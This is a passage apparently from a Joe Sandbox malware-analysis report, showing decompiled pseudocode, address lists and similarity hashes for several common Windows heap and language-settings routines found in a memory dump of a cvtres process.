					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E055FD4F0(_t83, 0x5586c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E055AB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x5696378 = 1;
						asm("int3");
						 *0x5696378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                        0x056523e3
                                                                        0x056523e8
                                                                        0x056523eb
                                                                        0x056523ee
                                                                        0x056523f3
                                                                        0x0565259b
                                                                        0x0565259b
                                                                        0x0565259d
                                                                        0x056525a3
                                                                        0x056525a3
                                                                        0x056523fb
                                                                        0x05652424
                                                                        0x0565244f
                                                                        0x05652460
                                                                        0x05652451
                                                                        0x05652451
                                                                        0x05652456
                                                                        0x05652458
                                                                        0x05652458
                                                                        0x0565245b
                                                                        0x0565245b
                                                                        0x05652426
                                                                        0x05652431
                                                                        0x05652436
                                                                        0x05652443
                                                                        0x05652438
                                                                        0x05652438
                                                                        0x05652438
                                                                        0x05652445
                                                                        0x05652445
                                                                        0x05652463
                                                                        0x05652469
                                                                        0x0565246f
                                                                        0x05652480
                                                                        0x05652495
                                                                        0x056524a1
                                                                        0x056524ce
                                                                        0x056524df
                                                                        0x056524d0
                                                                        0x056524d0
                                                                        0x056524d5
                                                                        0x056524d7
                                                                        0x056524d7
                                                                        0x056524da
                                                                        0x056524da
                                                                        0x056524a3
                                                                        0x056524b0
                                                                        0x056524b5
                                                                        0x056524c2
                                                                        0x056524b7
                                                                        0x056524b7
                                                                        0x056524b7
                                                                        0x056524c4
                                                                        0x056524c4
                                                                        0x056524e8
                                                                        0x05652497
                                                                        0x0565249a
                                                                        0x0565249a
                                                                        0x05652482
                                                                        0x05652488
                                                                        0x05652488
                                                                        0x05652471
                                                                        0x05652479
                                                                        0x05652479
                                                                        0x056524ef
                                                                        0x056523fd
                                                                        0x05652401
                                                                        0x05652412
                                                                        0x05652403
                                                                        0x05652403
                                                                        0x05652408
                                                                        0x0565240a
                                                                        0x0565240a
                                                                        0x0565240d
                                                                        0x0565240d
                                                                        0x0565241b
                                                                        0x0565241b
                                                                        0x056524f1
                                                                        0x056524f6
                                                                        0x05652507
                                                                        0x05652510
                                                                        0x00000000
                                                                        0x05652510
                                                                        0x0565250b
                                                                        0x00000000
                                                                        0x056524f8
                                                                        0x056524f8
                                                                        0x056524fc
                                                                        0x05652500
                                                                        0x05652512
                                                                        0x05652515
                                                                        0x0565251a
                                                                        0x05652521
                                                                        0x05652524
                                                                        0x05652529
                                                                        0x0565252f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0565253c
                                                                        0x0565255c
                                                                        0x05652561
                                                                        0x0565253e
                                                                        0x05652554
                                                                        0x05652559
                                                                        0x0565256a
                                                                        0x0565256d
                                                                        0x05652574
                                                                        0x05652586
                                                                        0x05652588
                                                                        0x0565258f
                                                                        0x05652590
                                                                        0x05652590
                                                                        0x05652597
                                                                        0x00000000
                                                                        0x05652597

                                                                        Strings
                                                                        • HEAP: , xrefs: 0565255C
                                                                        • HEAP[%wZ]: , xrefs: 0565254F
                                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0565256F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                        • API String ID: 0-3815128232
                                                                        • Opcode ID: ae3205a29eb505a9de7c1a1041a804fac38b9f44b7ed1a8a1196f545c846785d
                                                                        • Instruction ID: 1ac8777df5bf4945db0d94d628734621e5662e5690312a9f8e4fc6e585ee96f4
                                                                        • Opcode Fuzzy Hash: ae3205a29eb505a9de7c1a1041a804fac38b9f44b7ed1a8a1196f545c846785d
                                                                        • Instruction Fuzzy Hash: 2D51583D2842508AE336CF29C86877277E3FB48664F544959ECC38B781D235D847DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055AE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 93%
                                                                        			E055AE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E055AF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E055E95D0();
						}
						if(_t78 != 0) {
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E055EFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E055EBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E055E9600();
					if(_t97 < 0) {
						goto L6;
					}
					E055EBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L055AF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E055EBB40(_t83, _t102 + 0x24, _t78);
								if(L055B43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E055EBB40(_t84, _t102 + 0x24, _t94);
									if(L055B43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                        0x055ae620
                                                                        0x055ae628
                                                                        0x055ae62f
                                                                        0x055ae631
                                                                        0x055ae635
                                                                        0x055ae637
                                                                        0x055ae63e
                                                                        0x05605503
                                                                        0x05605503
                                                                        0x055ae64c
                                                                        0x055ae64c
                                                                        0x055ae651
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ae661
                                                                        0x055ae665
                                                                        0x0560542a
                                                                        0x055ae715
                                                                        0x055ae71a
                                                                        0x055ae71c
                                                                        0x055ae720
                                                                        0x055ae720
                                                                        0x055ae727
                                                                        0x055ae736
                                                                        0x055ae736
                                                                        0x055ae743
                                                                        0x055ae743
                                                                        0x055ae673
                                                                        0x055ae678
                                                                        0x055ae67d
                                                                        0x055ae682
                                                                        0x055ae685
                                                                        0x055ae692
                                                                        0x055ae69b
                                                                        0x055ae6a3
                                                                        0x055ae6ad
                                                                        0x055ae6b1
                                                                        0x055ae6b2
                                                                        0x055ae6bb
                                                                        0x055ae6bf
                                                                        0x055ae6c0
                                                                        0x055ae6c8
                                                                        0x055ae6cc
                                                                        0x055ae6d5
                                                                        0x055ae6d9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055ae6e5
                                                                        0x055ae6ea
                                                                        0x055ae6f9
                                                                        0x055ae70b
                                                                        0x055ae70f
                                                                        0x05605439
                                                                        0x0560545e
                                                                        0x0560545e
                                                                        0x00000000
                                                                        0x0560545e
                                                                        0x0560543b
                                                                        0x0560543e
                                                                        0x05605440
                                                                        0x05605445
                                                                        0x05605472
                                                                        0x05605475
                                                                        0x0560548d
                                                                        0x05605493
                                                                        0x056054a9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056054ab
                                                                        0x056054b4
                                                                        0x056054bc
                                                                        0x056054c8
                                                                        0x056054de
                                                                        0x056054fb
                                                                        0x056054e0
                                                                        0x056054e6
                                                                        0x056054eb
                                                                        0x056054eb
                                                                        0x056054de
                                                                        0x00000000
                                                                        0x056054bc
                                                                        0x05605477
                                                                        0x0560547a
                                                                        0x05605480
                                                                        0x05605483
                                                                        0x05605486
                                                                        0x0560548b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560548b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05605447
                                                                        0x05605447
                                                                        0x05605447
                                                                        0x05605447
                                                                        0x0560544e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05605450
                                                                        0x05605452
                                                                        0x05605455
                                                                        0x0560545a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560545c
                                                                        0x0560546a
                                                                        0x0560546d
                                                                        0x0560546f
                                                                        0x00000000
                                                                        0x0560546f
                                                                        0x055ae70f

                                                                        Strings
                                                                        • InstallLanguageFallback, xrefs: 055AE6DB
                                                                        • @, xrefs: 055AE6C0
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 055AE68C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        • API String ID: 0-1757540487
                                                                        • Opcode ID: 1f49156d8463ca1df897e14e93aa7afd82c9dc804da30936a47fc1d272794d59
                                                                        • Instruction ID: 2ae7ea37489a8fce9bcfd4cc37da36b71a54e593029f61c8cb69368ef471095a
                                                                        • Opcode Fuzzy Hash: 1f49156d8463ca1df897e14e93aa7afd82c9dc804da30936a47fc1d272794d59
                                                                        • Instruction Fuzzy Hash: 2D51A0765083469BC719DF24C444ABBB3E9BF88714F050A2EF986D7290F734D904CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CB8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E055CB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x5698748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E055AB150();
						} else {
							E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E055AB150();
						__eflags =  *0x5697bc8;
						if(__eflags == 0) {
							E05662073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E055CAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                                        0x055cb8f0
                                                                        0x055cb8f2
                                                                        0x055cb8f4
                                                                        0x05612c4e
                                                                        0x05612c50
                                                                        0x05612c56
                                                                        0x05612c5c
                                                                        0x05612c60
                                                                        0x05612c7f
                                                                        0x05612c84
                                                                        0x05612c62
                                                                        0x05612c77
                                                                        0x05612c7c
                                                                        0x05612c8a
                                                                        0x05612c8f
                                                                        0x05612c94
                                                                        0x05612c9c
                                                                        0x05612ca5
                                                                        0x05612ca5
                                                                        0x05612c9c
                                                                        0x05612c50
                                                                        0x055cb8fa
                                                                        0x055cb902
                                                                        0x055cb921
                                                                        0x055cb921
                                                                        0x055cb924
                                                                        0x055cb924
                                                                        0x055cb927
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055cb929
                                                                        0x055cb92b
                                                                        0x055cb92d
                                                                        0x055cb940
                                                                        0x00000000
                                                                        0x055cb940
                                                                        0x055cb932
                                                                        0x055cb932
                                                                        0x00000000
                                                                        0x055cb932
                                                                        0x00000000
                                                                        0x055cb904
                                                                        0x055cb904
                                                                        0x055cb90a
                                                                        0x055cb90c
                                                                        0x055cb916
                                                                        0x055cb919
                                                                        0x055cb915
                                                                        0x055cb915
                                                                        0x055cb91b
                                                                        0x055cb91b
                                                                        0x00000000
                                                                        0x055cb910

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        • Opcode ID: c3a6f7ef0a9252d771dd613678d77ec8f4b6738e24abcd6961dda8e132bccce0
                                                                        • Instruction ID: 528ea976ee40bc9bc89acb20b02b26dcf82d97b7e4b9d0a74c34e1abc2b0bba3
                                                                        • Opcode Fuzzy Hash: c3a6f7ef0a9252d771dd613678d77ec8f4b6738e24abcd6961dda8e132bccce0
                                                                        • Instruction Fuzzy Hash: 9011D0353141029FDB28DB69C496F3ABBA6FF80730F6881ADE40ACF240DA34D980D685
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0566E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E0566E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0566BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0566BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0566AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E055E9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0566A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0566A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E055E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0566A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0566A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E055C2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E055BB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E055BFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E055C7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0565FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                        0x0566e547
                                                                        0x0566e549
                                                                        0x0566e54f
                                                                        0x0566e553
                                                                        0x0566e557
                                                                        0x0566e55a
                                                                        0x0566e55c
                                                                        0x0566e55f
                                                                        0x0566e561
                                                                        0x0566e567
                                                                        0x0566e56b
                                                                        0x0566e7e2
                                                                        0x00000000
                                                                        0x0566e571
                                                                        0x0566e575
                                                                        0x0566e577
                                                                        0x0566e57b
                                                                        0x0566e57c
                                                                        0x0566e57d
                                                                        0x0566e57e
                                                                        0x0566e57f
                                                                        0x0566e588
                                                                        0x0566e58f
                                                                        0x0566e591
                                                                        0x0566e592
                                                                        0x0566e592
                                                                        0x0566e596
                                                                        0x0566e59e
                                                                        0x0566e5a0
                                                                        0x0566e5a6
                                                                        0x0566e61d
                                                                        0x0566e61d
                                                                        0x0566e621
                                                                        0x0566e623
                                                                        0x0566e630
                                                                        0x0566e630
                                                                        0x0566e7e6
                                                                        0x0566e7eb
                                                                        0x0566e7ed
                                                                        0x0566e7f4
                                                                        0x0566e7fa
                                                                        0x0566e7ff
                                                                        0x0566e7ff
                                                                        0x0566e80a
                                                                        0x0566e812
                                                                        0x0566e812
                                                                        0x0566e5ab
                                                                        0x0566e5b4
                                                                        0x0566e5b9
                                                                        0x0566e5be
                                                                        0x0566e5c0
                                                                        0x0566e5c2
                                                                        0x0566e5c8
                                                                        0x0566e5c9
                                                                        0x0566e5cb
                                                                        0x0566e5cc
                                                                        0x0566e5d5
                                                                        0x0566e5e4
                                                                        0x0566e5f1
                                                                        0x0566e5f8
                                                                        0x0566e5f8
                                                                        0x0566e5d5
                                                                        0x0566e602
                                                                        0x0566e616
                                                                        0x0566e63d
                                                                        0x0566e644
                                                                        0x0566e64d
                                                                        0x0566e652
                                                                        0x0566e657
                                                                        0x0566e659
                                                                        0x0566e65b
                                                                        0x0566e661
                                                                        0x0566e662
                                                                        0x0566e664
                                                                        0x0566e665
                                                                        0x0566e66e
                                                                        0x0566e67d
                                                                        0x0566e68a
                                                                        0x0566e691
                                                                        0x0566e691
                                                                        0x0566e66e
                                                                        0x0566e6b0
                                                                        0x00000000
                                                                        0x0566e6b6
                                                                        0x0566e6bd
                                                                        0x0566e6c7
                                                                        0x0566e6d7
                                                                        0x0566e6d9
                                                                        0x0566e6db
                                                                        0x0566e6de
                                                                        0x0566e6e3
                                                                        0x0566e6f3
                                                                        0x0566e6fc
                                                                        0x0566e700
                                                                        0x0566e700
                                                                        0x0566e704
                                                                        0x0566e70a
                                                                        0x0566e70a
                                                                        0x0566e713
                                                                        0x0566e716
                                                                        0x0566e719
                                                                        0x0566e720
                                                                        0x0566e761
                                                                        0x0566e76b
                                                                        0x0566e774
                                                                        0x0566e77a
                                                                        0x0566e77a
                                                                        0x0566e78a
                                                                        0x0566e791
                                                                        0x0566e799
                                                                        0x0566e79b
                                                                        0x0566e79f
                                                                        0x0566e7aa
                                                                        0x0566e7c0
                                                                        0x0566e7ac
                                                                        0x0566e7b2
                                                                        0x0566e7b9
                                                                        0x0566e7b9
                                                                        0x0566e7c7
                                                                        0x0566e806
                                                                        0x00000000
                                                                        0x0566e7c9
                                                                        0x0566e7d1
                                                                        0x0566e7d8
                                                                        0x00000000
                                                                        0x0566e7d8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566e722
                                                                        0x0566e72e
                                                                        0x0566e748
                                                                        0x0566e74c
                                                                        0x0566e754
                                                                        0x0566e756
                                                                        0x0566e75c
                                                                        0x0566e75c
                                                                        0x00000000
                                                                        0x0566e75c
                                                                        0x0566e758
                                                                        0x0566e758
                                                                        0x00000000
                                                                        0x0566e758
                                                                        0x0566e750
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566e752
                                                                        0x00000000
                                                                        0x0566e752
                                                                        0x0566e730
                                                                        0x0566e735
                                                                        0x0566e73d
                                                                        0x0566e73f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566e741
                                                                        0x0566e741
                                                                        0x00000000
                                                                        0x0566e741
                                                                        0x0566e739
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566e73b
                                                                        0x00000000
                                                                        0x0566e73b
                                                                        0x0566e722
                                                                        0x0566e720
                                                                        0x0566e6b0
                                                                        0x0566e618
                                                                        0x00000000
                                                                        0x0566e618

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction ID: 7bec809d67f382eec9f1fa8b2bbd83ff1e14f302b4467498e1935bacf3f17c70
                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction Fuzzy Hash: C391A1753083429FE724CE65C844B17BBEABF84714F14892DF596CB680D776E904CB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056251BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E056251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x56805f0);
				E055FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E055BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E056253CA(0);
						return E055FD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E055EF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E055C3690(1, _t117, 0x5581810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
